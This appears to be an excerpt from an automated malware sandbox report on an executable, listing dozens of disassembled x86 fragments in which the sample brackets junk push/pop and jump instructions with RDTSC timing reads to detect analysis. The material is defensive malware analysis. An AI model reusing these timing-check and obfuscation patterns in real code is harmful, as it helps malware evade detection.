                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 76D971 second address: 76D977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 76D977 second address: 76D991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FED7550886Bh 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 76D991 second address: 76D9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E529h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 76D9AE second address: 76D9D3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FED75508866h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FED75508874h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 76B8F9 second address: 76B91A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FED74F3E516h 0x00000010 pop eax 0x00000011 popad 0x00000012 push ebx 0x00000013 ja 00007FED74F3E51Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 76B91A second address: 76B935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FED75508870h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 774059 second address: 774070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E523h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 773AAF second address: 773AB9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FED75508866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 773D43 second address: 773D60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 773D60 second address: 773D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 773D66 second address: 773D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 773D6B second address: 773D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 77F899 second address: 77F8A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 ja 00007FED74F3E516h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 77FA05 second address: 77FA0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 77FA0B second address: 77FA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 77FA11 second address: 77FA16 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 77FA16 second address: 77FA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 77FA23 second address: 77FA29 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 77FA29 second address: 77FA34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FED74F3E516h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 782171 second address: 782177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 78229B second address: 7822A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 793A55 second address: 793A5E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 793A5E second address: 793A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007FED74F3E51Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 797398 second address: 7973A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FED75508866h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7973A4 second address: 7973A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 797220 second address: 79723F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED75508879h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 79A8A4 second address: 79A8AA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7A125E second address: 7A1264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7A1264 second address: 7A1271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007FED74F3E51Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7A1271 second address: 7A1278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7A034A second address: 7A0350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7A0350 second address: 7A0381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FED7550886Fh 0x0000000b pushad 0x0000000c jmp 00007FED75508879h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7A2AD2 second address: 7A2B3A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED74F3E51Ch 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jng 00007FED74F3E516h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push esi 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FED74F3E520h 0x0000001f pop esi 0x00000020 jne 00007FED74F3E535h 0x00000026 jmp 00007FED74F3E51Dh 0x0000002b push esi 0x0000002c push edx 0x0000002d pop edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7C319C second address: 7C31CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FED75508878h 0x0000000b jmp 00007FED75508870h 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7C31CD second address: 7C31DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jnl 00007FED74F3E516h 0x0000000f pop eax 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7C31DD second address: 7C31E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7C5977 second address: 7C597B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7C597B second address: 7C5999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FED75508878h 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7C5999 second address: 7C59B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7C59B0 second address: 7C59B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7DDB67 second address: 7DDB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jo 00007FED74F3E516h 0x0000000e pop ebx 0x0000000f popad 0x00000010 push ecx 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7DDE23 second address: 7DDE2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FED75508866h 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7DDE2F second address: 7DDE33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7DE431 second address: 7DE435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7DE6F8 second address: 7DE70C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jnp 00007FED74F3E516h 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7DE8AF second address: 7DE8B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7DE8B5 second address: 7DE8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 jmp 00007FED74F3E51Fh 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7E1602 second address: 7E1609 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7E1B88 second address: 7E1C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FED74F3E526h 0x0000000b nop 0x0000000c mov edx, 7765BC42h 0x00000011 push dword ptr [ebp+122D3510h] 0x00000017 or edx, dword ptr [ebp+1251D257h] 0x0000001d call 00007FED74F3E519h 0x00000022 jnl 00007FED74F3E538h 0x00000028 push eax 0x00000029 pushad 0x0000002a jno 00007FED74F3E518h 0x00000030 push eax 0x00000031 pushad 0x00000032 popad 0x00000033 pop eax 0x00000034 popad 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 jmp 00007FED74F3E528h 0x0000003e mov eax, dword ptr [eax] 0x00000040 push esi 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7E2E01 second address: 7E2E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7E2E0A second address: 7E2E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E528h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7E667E second address: 7E6684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E90020 second address: 4E90093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FED74F3E520h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FED74F3E51Bh 0x0000000f add cx, 563Eh 0x00000014 jmp 00007FED74F3E529h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e jmp 00007FED74F3E521h 0x00000023 xchg eax, ebp 0x00000024 jmp 00007FED74F3E51Eh 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FED74F3E51Ah 0x00000034 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E90093 second address: 4E90099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E90099 second address: 4E9009F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E9009F second address: 4E900D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508878h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FED7550886Dh 0x00000014 mov ebx, esi 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70E00 second address: 4E70E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70E06 second address: 4E70E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70E0A second address: 4E70E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70E0E second address: 4E70E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70E1D second address: 4E70E21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70E21 second address: 4E70E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EC010A second address: 4EC011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E51Eh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EC011C second address: 4EC0120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EC0120 second address: 4EC014B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FED74F3E529h 0x00000011 pop ecx 0x00000012 mov dx, 63B4h 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EC014B second address: 4EC0151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EC0151 second address: 4EC0155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EC0155 second address: 4EC0159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EC0159 second address: 4EC016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EC016A second address: 4EC0170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EC0170 second address: 4EC0175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EC0175 second address: 4EC018C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov al, bl 0x0000000c mov ax, CE7Bh 0x00000010 popad 0x00000011 pop ebp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop edi 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EC018C second address: 4EC0190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4EC0190 second address: 4EC01AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FED75508872h 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E500B6 second address: 4E500BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E500BA second address: 4E500D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E500D2 second address: 4E5010C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, A954h 0x00000007 push edi 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FED74F3E521h 0x00000016 adc ah, FFFFFFC6h 0x00000019 jmp 00007FED74F3E521h 0x0000001e popfd 0x0000001f mov dl, ch 0x00000021 popad 0x00000022 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E5010C second address: 4E50126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, 7460D15Fh 0x00000014 popad 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50126 second address: 4E5016F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 pushfd 0x00000007 jmp 00007FED74F3E527h 0x0000000c or esi, 6F45CB5Eh 0x00000012 jmp 00007FED74F3E529h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E5016F second address: 4E50173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50173 second address: 4E50186 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50186 second address: 4E5018C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E5018C second address: 4E50190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E50190 second address: 4E501BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FED75508875h 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70C2A second address: 4E70C5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED74F3E51Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FED74F3E51Eh 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70C5F second address: 4E70C65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70C65 second address: 4E70C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70C69 second address: 4E70C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E706D4 second address: 4E706F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E706F1 second address: 4E70727 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED7550886Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ch, dl 0x00000013 movzx eax, dx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov si, CE6Dh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
